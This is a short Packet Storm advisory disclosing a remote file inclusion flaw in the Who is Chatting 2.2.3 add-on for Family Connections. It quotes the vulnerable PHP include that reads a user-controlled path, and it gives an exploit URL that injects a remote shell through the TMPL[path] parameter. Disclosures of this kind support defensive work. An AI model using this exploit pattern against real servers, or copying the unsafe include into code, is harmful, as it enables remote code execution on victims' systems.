Family Connections Who is Chatting add-on version 2.2.3 suffers from a remote file inclusion vulnerability.
dad4c904508619e83f790a09c477c1a6f959b12a06d7eb1b4651618dfb6fd96d*=======================================================
Who is Chatting 2.2.3 Remote File Include Vulnerability
=======================================================
# Author : lumut--
# Script Details : http://www.familycms.com/downloads/details.php?file=50
# Bugs :
<?
$chat_inc = $TMPL[\'path\'] . \"inc/chatting_inc.php\";
include_once ($chat_inc);
?>
# Expl: http://server/mod_chatting/themes/default/header.php?TMPL[path]=[shell]
# Greetz & Thanks: cr4wl3r, team_elite, kisame, virusfree, doniskynet,
manadocoding*
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed